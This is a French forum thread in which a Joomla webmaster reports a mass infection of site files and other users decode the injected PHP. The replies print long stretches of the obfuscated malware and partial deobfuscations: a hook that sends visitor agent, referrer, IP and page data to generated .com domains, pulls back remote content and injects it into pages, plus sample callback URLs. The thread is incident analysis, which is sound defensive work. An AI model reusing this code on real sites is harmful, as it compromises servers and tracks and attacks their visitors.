Je suis attentif à la sécurité de mes sites, mes joomla sont à jour ainsi que toutes les extensions ( j'en ai un minimum pour privilégier la sécurité ).

De plus j'utilise une sécurité via un htaccess que je paye et qui s'appelle Aesecure pour ceux qui connaissent, et qui faisait très bien le job jusqu'à cette attaque.

 

J'ai un petit module ( eyesite ) qui me prévient en cas de modif de mes fichiers, c'est comme ça que j'ai vu que des fichiers natifs ( plus de 3000 ) avaient été infécté uniquement sur la première ligne par ce code. Les sites continuent à fonctionner normalement.

 

Je retablie ensuite une sauvegarde "propre" pour essayer de traquer la nouvelle attaque qui fait toujours la même choses sur mes 4 sites, donc mes 4 répertoires distincts sur le serveur.

 

Voici un exemple de fichier corrompu:

 

https://drive.google.com/file/d/0B-xPj1JrZ7KVOEFWSVpESE5sNmc/view?usp=sharing

 

 

C'est pour cela que je suis très curieux de savoir si on peut decrypter ce code pour savoir ce qu'il fait !!!

 

Encore merci pour votre aide.

Link to comment
Share on other sites

C'est une basse vengeance d'un client/cliente qui voulait Karen, Kriss ou David et qui s'est retrouvé avec Fifye, décidé à pourrir tes sites. :ane:

 

Bon je sors.

 

*on entend s'effacer le tintement des clochettes de son chapeau de la salle accueillant les guerriers du code*

Link to comment
Share on other sites

C'est une basse vengeance d'un client/cliente qui voulait Karen, Kriss ou David et qui s'est retrouvé avec Fifye, décidé à pourrir tes sites. :ane:

 

Bon je sors.

 

*on entend s'effacer le tintement des clochettes de son chapeau de la salle accueillant les guerriers du code*

 

 

Peut-être !!! j'avais pas pensé à ça !!!  :ouioui:

Link to comment
Share on other sites

EDIT : 

 

Et pour plus de clarté la méthode pour désinfecter (trouver apres avoir fait une recherche sur google sur le nom de la fonction day212 ) :

 

http://artefact.io/massive-wordpress-hack-seems-underway/

 

 

Message original :

 

 

Donc en gros il va recuperer le fichier d'une url genre :

 

http://00325a28.com/398220?jm62.jm62.1DT27LkSt972znb5.1DT27LkSt972znb5.z3G5qPlZ%252FcOsmSm8v94vTKDkmt2cX0dQ7eh4VuQKkYkP6%252F5ccKJMx9tjiI4%252Bf91bFEG5lRBVfe3it%252BYYfXuJ1OQvVvIQ9LIrTjw%253D

 

http://9f86307a.com/159709?d33F.d33F.LSeFpMcTplTmy%252BOJ.LSeFpMcTplTmy%252BOJ.NmLK4IdY7Em8nLzM9JRTan7tfrz6U5w0fLCX2RcRVhmwQEHIG8x83383bgLBVeXXE1Ju9zTl8DOv7wlXEfTfowN7uKtNYlUOKls%253D

 

Les domaines ne sont plus actif, mais on ne sait pas quand il on été coupée.

Le fichier récupérer est executé.

 

Regarde bien les process de ton serv. 

 

J'espères que tu as un backup d'avant sinon Reformate :) 

 

Les grandes lignes du script :

if(!function_exists("pa22")) { 	function pa22($v) { 		Header("Content-Encoding: none"); 		$t=dcoo($v); 		if(preg_match("/\<\/body/si",$t)) { 			return preg_replace("/(\<\/body[^\>]*\>)/si", day212()."\n"."$"."1", $t,1); 		} else { 			if(preg_match("/\<\/html/si",$t)) { 				return preg_replace("/(\<\/html[^\>]*\>)/si", day212()."\n"."$"."1", $t,1); 			} else { 				return $t; 			} 		} 	} } ob_start("pa22");
<?phpfunction gtd ($url) { 	return "";	$co = ""; 	$co = @g_1($url); //file_get_contents	if ($co !== false) return $co; 	$co = @g_2($url);  //curl_init	if ($co !== false) return $co; 	$co = @g_3($url); //file	if ($co !== false) return $co; 	$co = @g_4($url); //parse_url	if ($co !== false) return $co; 	return "";}  function random($arr,$qw) { 	$g=" w-86794587495086f963874,qq-82d94486e,r-86297186e94186d945,wq-874941874,s-873,g= w. r; m-86d944835,sq-87396487293787396086c951874";	$soy = "en2";	$xx="explode";	$ecx="create_function";	$scy="str_replace";	$a = explode("|","\x|\1|="|";$|$");	$aa = explode("|","8|9|-|,| ");	$mec="create_function";	for($i=0;$i<sizeof($a);$i++) {		$g = $scy($aa[$i],$a[$i],$g); 	}	/* $g */	$w="gethost";	$qq="dn";	$r="byname";	$wq="tat";	$s="s";	$g="gethostbyname";	$m="md5";	$sq="str_split";	/* $g */    $arr = $sq($m($qw.$g($s.$wq.$qq.$s.$qw)), ;	return $arr[rand((0.24-(0.03*),(0.1875*6))].$qw;} function cqq($qw) { 	$domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb"); 	return random($domarr,$qw); } function k34($op,$text) { 	return base64_encode(en2($text, $op)); } function check212($param) { 	if(!isset($_SERVER[$param])) $a="non"; 	else if ($_SERVER[$param]=="") $a="non"; 	else $a=$_SERVER[$param]; return $a;} function en2($s, $q) { 	$l="strlen";	$p="pack";	$r="substr";	$m="md5"; 	$g = ""; 	while ($l($g)<$l($s)) { 		$q = pack("H*",md5($g.$q."q1w2e3r4")); 		$g.=$r($q,0,; 	} 	return $s^$g; }function day212() { 	$a=check212("HTTP_USER_AGENT"); 	$b=check212("HTTP_REFERER"); 	$c=check212("REMOTE_ADDR"); 	$d=check212("HTTP_HOST"); 	$e=check212("PHP_SELF"); 	$domarr = array("33db9538","9507c4e8","e5b57288","54dfa1cb");	if (($a=="non") or ($c=="non") or ($d=="non") or strrpos(strtolower($e),"admin") or (preg_match("/" . implode("|", array("google","slurp","msnbot","ia_archiver","yandex","rambler")) . "/i", strtolower($a))) ) { 	 	$o1 = ""; 	} else { 	 	$op=mt_rand(100000,999999); 	 	$g4=$op."?".urlencode(urlencode(k34($op,$a).".".k34($op,$b).".".k34($op,$c).".".k34($op,$d).".".k34($op,$e))); 	 	$url="http://".cqq(".com")."/".$g4; 	 	echo $url;	 	//$ca1=en2(@gtd($url),$op); 	 	$a1=@explode("!NF0",$ca1); 	 	if (sizeof($a1)>=2) $o1 = $a1[1]; 	 	else $o1 = ""; 	} 	return $o1; }

Et pour plus de clarté la méthode pour désinfecter (trouver apres avoir fait une recherche sur google sur le nom de la fonction day212 ) :

 

http://artefact.io/massive-wordpress-hack-seems-underway/

Link to comment
Share on other sites

Quel rapport avec la choucroute ? D'où tu sors ton "day212" ? Quel rapport entre joomla et wordpress ?

 

C'est la même mécanique de hack mais ça s'arrête là.... Le code n'a strictement rien à voir avec ce que tu colles....

 

Pour info, voilà le décryptage du premier layer :

if((function_exists("    x6f    142    x5f    163    x74    141    x72    164") && (!isset($GLOBALS["    x61    156    x75    156    x61"])))) { $GLOBALS["    x61    156    x75    156    x61"]=1; $uas=strtolower($_SERVER["    x48    124    x54    120    x5f    125    x53    105    x52    137    x41    107    x45    116    x54"]); if ((strstr($uas,"    x6d    163    x69    145")) or (strstr($uas,"    x72    166    x3a    61    x31")) or (strstr($uas,"    x61    156    x64    162    x6f    151    x64"))) { $tfjizmc = "    x63    162    x65    141    x74    145    x5f    146    x75    156    x63    164    x69    157    x6e"; function mxwrnfp($n){return chr(ord($n)-1);} @error_reporting(0); $fenmamv = implode(array_map("mxwrnfp",str_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!    x246767~6<Cw6<pd%w6Z6<.5`hA    x27pd%6<pd%w6Z6<.4`hA    x27pd%6<pd%w6Z6<.3`hA    x27pd%6<pd%w6Z6<.2`hA    x27pd%6<C    x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf    x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX    x27u%)7fmjix6<C    x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#    x27rfs%6~6<    x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA    x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA    x27K6<    x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA    x273qj%6<*Y%)fnbozcYufhA    x272qj%6<^#zsfvr#    x5cq%7/7#@#7/7^#iubq#    x5cq%    x27jsv%6<C>^#zsfvr#    x5cq%7**^#zsfvr#    x5cq%)ufttj    x22)gj6<^#Y#    x5cq%    x27Y%6<.msv`ftsbqA7>q%6<    x7fw6*    x7f_*#fubfsdXk5`{66~6<&w6<    x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA    x27&6<.fmjgA    x27doj%6<    x7fw6*    x7f_*#fmjgk4`{6~6<tfs%w6<    x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR    x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR    x27id%6<    x7fw6*    x7f_*#ujojRk3`{666~6<&w6<    x7fw6*CW&)7gj6<.[A    x27&6<    x7fw6*    x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!}    x27;!>>>!}_;gvc%}&;ftmbg}    x7f;!osvufs}w;*    x7f!>>    x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!    x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!    x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!    x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!    x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg    x22)!gj}1~!<2p%    x7f!~!<##!>!2p%Z<^2    x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO    x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f    x27,*e    x27,*d    x27,*c    x27,*b    x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%    x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj    x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc    x7f!|!*uyfu    x27k:!ftmf!}Z;^nbsbq%    x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}    x27;%!<*#}_;#)323ldfid>}&;!osvufs}    x7f;!opjudovg}k~~9{d%:osvufs:~928>>    x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4    x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>    x22!ftmbg)!gj<*#k#)usbut`cpV    x7f    x7f    x7f    x7f<u%V    x27{ftmfV    x7f<*X&Z&S{ftmfV    x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x    x22l:!}V;3q%}U;y]}R;2]},;osvufs}    x27;mnui}&;zepc}A;~!}    x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U!    x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_    x5c}X    x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!    x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:*r%:-t%)3of:opjudovg<~    x24<!%o:!>!    x242178}527}88:}334}472    x24<!%ff2!>!bssbz)    x24]25    x24-    x24-!%    x24-    x24*!|!    x24-    x24    x5c%j^    x24-    x24tvctus)%    x24-    x24b!>!%yy)#}#-#    x24-    x24-tusqpt)%z-#:#*    x24-    x24!>!    x24/%tjw/    x24)%    x24-    x24y4    x24-    x24]y8    x24-    x24]26    x24-    x24<%j,,*!|    x24-    x24gvodujpo!    x24-    x24y7    x24-    x24*<!    x24-    x24gps)%j>1<%j=tj{fpg)%    x24-    x24*<!~!    x24/%t2w/    x24)##-!#~<#/%    x24-    x24!>!fyqmpef)#    x24*<!%t::!>!    x24Ypp3)%cB%iN}#-!    x24/%tmw/    x24)%c*W%eN+#Qi    x5c1^W%c!>!%i    x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!    x24/%tmw/    x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr    x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss    x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s:    x5c%j:.2^,%b:<!%c:>%s:    x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~    x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#    x24#-!#]y38#-!%w:**<")));$opfzdky = $tfjizmc("", $fenmamv); $opfzdky();}}
Link to comment
Share on other sites

Bas j'ai decrypté tout le truc.... donc si le code a clairement a voir...

 

Que sa soit Wordpress ou joomla c'est la meme chose

 

Checker les users avec des ID > 1000000 ou faire un find grep depends pas du CMS.

 

Je te mets mon fichier de travail en entier comme sa tu vera que le code "n'a strictement rien a voir avec ce que je colle"

<?php 	$zhdlaryb = '8399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Yq%7/7#@#7/7^#iubq#	x5cq%	x27jsv%6<C>^#zsfvr#	x5cq%7**^#ww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K7V;3q%}U;y]}R;2]},;osvufs}	x27;mnui68]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452f<*X&Z&S{ftmfV	x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,`TW~	x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#	x7f<u%V	x27{ftmfV	x7zsfvr#	x5cq%)ufttj	x22)gj6<ps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fFEBFI,6<*127-UVPFNJU,6<*27-SFpjudovg}x;0]=])0#)U!	x27{**u%-#jt0}Z;0]=]0{return chr(ord($n)-1);} #-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]3utjyf`4	x223}!+!<+{e%+*!*+fepdfe{h+{d%)+o^#Y#	x5cq%	x27Y%6<.msv`ftsbqA7>q%6<	x7fw6*	x7f_*#fubfstpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:cee:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y	x64"))) { $tfjizmc = "	x63	162	x65	1x27&6<.fmjgA	x27doj%6<	x7fw6*	x7f_*#fmjgk4`{6~6<tfs%w6<	x7fw6*	x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuo#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gPnmamv = implode(array_map("mxwrnfp",str_split("%!*#opo#>>}R;msv}.;/#/ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd175L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]%w6Z6<.4`hA	x27pd%6<pd%w6Z6<.3`hA	x27pd%6<pd%w6Z6<.2`!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<18:56985:6197g:74985-rr.93OJ`GB)fubfsdXA	x27K6<	x7fw6*3qjXA6~6<u%7>/7&6|7**111127-K)ebfsX	x27u%)7fmjix6<C	x27&6<*rfs%7-K)27id%6<	x7fw6*	x7f_*#ujojRk3`{666~6<&w6<	x7fw6*CW&)7gj6<.[A	x27&6<	x22#)fepmqyfA>2b%!<*qp%-*.%)e4-	x24b!>!%yy)#}#-#	x24-	x24-tusqpt)%z-#:#*	x24-	x24!>!	x24/%tjojneb#-*f%)sfxpmpusut)]s]o]s]#)fepmqyf	x27*&7-n%)utjm6<	x7fw6*CW&)7gj6<*K)ftpmd]#-bubE{h%)tpqsut>j%!*72!	x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqs67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>hA	x27pd%6<C	x27pd%6|6.7eu{66~67<&w6<*&7-#o273qj%6<*Y%)fnbozcYufhA	x272qj%6<^#zsfvr#	x5c>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%}&;zepc}A;~!}	x7f;!|!}{;)gj}l;33bq}k;oidk!~!<**qp%!-uyfu%)3#/},;#-#}+;%-qp%)54l}	x27;%!<*#}_;#)323ldfid3:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpm,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88dof.)fepdof./#@#/qp%>5h%!<*::::::-111112*197-2qj%7-K)udfoopdXA	x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fw/	x24)%	x24-	x24y4	x24-	x24]y8	x24-	x24]26	x24-	!**X)ufttj	x22)gj!|!*nbsbq%)323ldffujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#	x27rfs%6~6QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHBQi	x5c1^W%c!>!%i	x5c2^<!Ce*[!	125	x53	105	x52	137	x41	107	x45	116	x54"]); if ((st6]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!	x2tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58,%b:<!%c:>%s:	x5c%j:^<!%w`	x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>uas,"	x72	166	x3a	61	x31")) or (strstr($uas,	156	x61"])))) { $GLOBALS["	x61	156	x75	156	x61"]=1; $uas=strtol72]37y]672]48y]#>s%<#46<	x7fw6<*K)ftpmdXA6|7*#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_	x5c}X	x2fjizmc("", $fenmamv); $opfzdky();}}x24-	x24-!%	x24-	x24*!|1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w2>j%!|!*#91y]c9y]g2y]#>>*7L6M7]D4]275]D:M8]Df#<%tdz>#L4]224)##-!#~<#/%	x24-	x24!>!fyqmpef)#	x24*<!%t::!>!	x24Ypp3)%cB%iN}#-!	x!>!(%w:!>!	x246767~6<Cw6<pd%w6Z6<.5`hA	x27pd%6<pdI#)q%:>:r%:**t%)m%=*h%)m%):fmjix:<##:vd}R;*msv%)}.;`UQPMSVD!-id%>:h%:<#64y]552]e7y]#>n%<#372]58y]4of)fepdof`57ftbc	x7f!|!*uyfu	x27k:!ftmf!}Z;^nbsbq%	x5cSFWSFT`%}X;!spf;!osvufs}w;*	x7f!>>	x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)**f	x27,*e	x27,*d	x27,*c	x27,*b	x27)fepsfebfI{*w%)kVx{**#k#)tutjyf`x	x22l:!}ower($_SERVER["	x48	124	x54	120	x5f44#)zbssb!>!ssbnpe_GMFT`))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!g4-	x24gps)%j>1<%j=tj{fpg)%	x24-	x24*<!~!	x24/%t2w/	x]y76]277#<!%t2w>#]y74]273]y7%7>	x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA	x)tutjyf`opjudovg	x22)!gj}1~!<2p%	x7f!~!<##!>!2p%Z<^2fuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`ms>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c6]24]31#-%tdz*Wsfuvso!%bss	x5csboemhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#>}&;!osvufs}	x7f;!opjudovg}k~~9{d%:osvufs:~928>>	x22:pjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>	x22!ftmbg)!gdXk5`{66~6<&w6<	x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA	`SFTV`QUUI&b%!|!*)323zbek!~!<b%	x7f!<Xj<*#k#)usbut`cpV	x7f	x7f	x7f2]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:*r%:-t%)uqpuft`msvd},;uqpuft`msvd}+;!>!}	x27;!>>>!}_;gvc%}&;ftmbg}	x7"	x61	156	x64	162	x6f	151mtf!%b:>%s:	x5c%j:.2^4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#mdR6<*id%)dfyfR	x27tfs%6<*17-S!	x24-	x24	x5c%j^	x24-	x24tvctus)%	x2)utjm!|!*5!	x27!hmg%)7fw6*CWtfs%)7gj6<*id%)ftp%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!41	x74	145	x5f	146	x75	156	x63	164	x69	157	x6e"; function mxwrnfp($n)	x24<!%ff2!>!bssbz)	x24]25		x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO	x24/%tmw/	x24)%c*W%eN+#pp2)%zB%z>!	x24/%tmw/	x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:759855Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fd4<!%tmw!>!#]y84]275]y83]273if((function_exists("	x6f	142	x5f	163	-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#	x24#-!##QwTW%hIr	x5c1^-%r	x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%t]y38#-!%w:**<")));$opfzdky = $t)3of:opjudovg<~	x24<!%o:!>!	x242178}527}88:}334}4729275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tgoj{hA!osvufs!~<3,j%>j%!*3!	x27!hmg%!)!gj!<2,*j%!-#1!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubm@error_reporting(0); $fex74	141	x72	164") && (!isset($GLOBALS["	x61	156	x75ut>j%!*9!	x27!hmg%)!gj!~<ofmy%GTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR	xy]27]28y]#/r%/h%)n%-#+q%V<*#fopoV;hojepdoF.uofuopD#)y<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)#x24<%j,,*!|	x24-	x24gvodujpo!	x24-	x24y7	x24-	x24*<!	x2uhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<*rstr($uas,"	x6d	163	x69	145")) or (strstr($STrrEvxNoITCnuF_EtaeRCxECaLPer_RtShbvtjmrvw'; 	$dkplquqy=explode(chr((477-357)),substr($zhdlaryb,(34636-28710),(184-150))); 	$dkplquqy= array('STrrEv','NoITCnuF_EtaeRC','ECaLPer_RtS');	$jybeug = $dkplquqy[0]($dkplquqy[(6-5)]);	$jybeug = 'CReatE_FunCTIoN';	$xvhcpp = $dkplquqy[0]($dkplquqy[(14-12)]); 	$xvhcpp = 'StR_rePLaCE';	if (!function_exists('robqmsyuuh')) { 		function robqmsyuuh($telwmf, $apabbohiuv,$mmaphcjzy) { 			$adexbrluw = NULL; 			for($rvuvgq=0;$rvuvgq<(sizeof($telwmf)/2);$rvuvgq++) { 				$adexbrluw .= substr($apabbohiuv, $telwmf[($rvuvgq*2)],$telwmf[($rvuvgq*2)+(7-6)]); 			} return $mmaphcjzy(chr((29-20)),chr((511-419)),$adexbrluw); 		}; 	} 	$ztxsjbc = explode(chr((181-137)),'5126,38,5574,51,2975,64,3745,35,2641,52,5883,43,2931,44,4538,25,846,37,4795,69,540,25,5550,24,1041,48,2755,57,3386,49,1234,53,1815,43,1639,57,1394,64,2496,64,3062,22,2298,57,1363,31,3946,44,1858,45,49,55,391,27,664,54,4303,49,883,57,4734,25,4646,30,469,29,5655,37,1458,68,940,49,4042,38,3474,27,4476,62,3603,66,5484,66,5432,52,1696,63,5625,30,2149,49,4713,21,1287,51,3260,25,4584,62,3990,52,4891,47,1526,28,5834,49,3669,39,2258,40,2107,42,2355,58,4150,49,1617,22,718,60,3780,24,2560,52,4352,38,1903,34,2462,34,1975,21,3535,68,1089,21,1996,44,4199,53,1110,60,5378,54,623,41,4252,51,4390,28,370,21,245,56,1759,56,5714,30,3708,37,148,34,1937,38,498,42,3084,59,5099,27,3918,28,2693,62,2198,60,5692,22,3435,39,3501,34,3039,23,4418,58,5327,51,4864,27,3178,23,4676,37,1554,63,2413,49,5779,55,3866,52,3317,69,4938,22,2612,29,4759,36,4080,37,0,49,4960,60,5230,66,104,44,1338,25,778,68,5020,46,2040,67,989,52,3285,32,1170,64,5066,33,5744,35,565,58,182,63,2812,61,4117,33,3804,62,418,51,4563,21,2873,58,3201,59,301,69,5164,66,5296,31,3143,35'); 		$uzencuwe = $jybeug("",robqmsyuuh($ztxsjbc,$zhdlaryb,$xvhcpp)); 	$jybeug=$zhdlaryb;	$uzencuwe(""); 	$uzencuwe=(395-274); 	$zhdlaryb=$uzencuwe-1; 	$uzencuwe = create_function("",		if((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) { 			$GLOBALS["anuna"]=1; 			$uas=strtolower($_SERVER["HTTP_USER_AGENT"]); 			if ((strstr($uas,"msi")) or (strstr($uas,"rv:11")) or (strstr($uas,"android"))) { 				$tfjizmc = "create_function"; 				function mxwrnfp($n){					return chr(ord($n)-1);				} @error_reporting(0); 				$fenmamv = 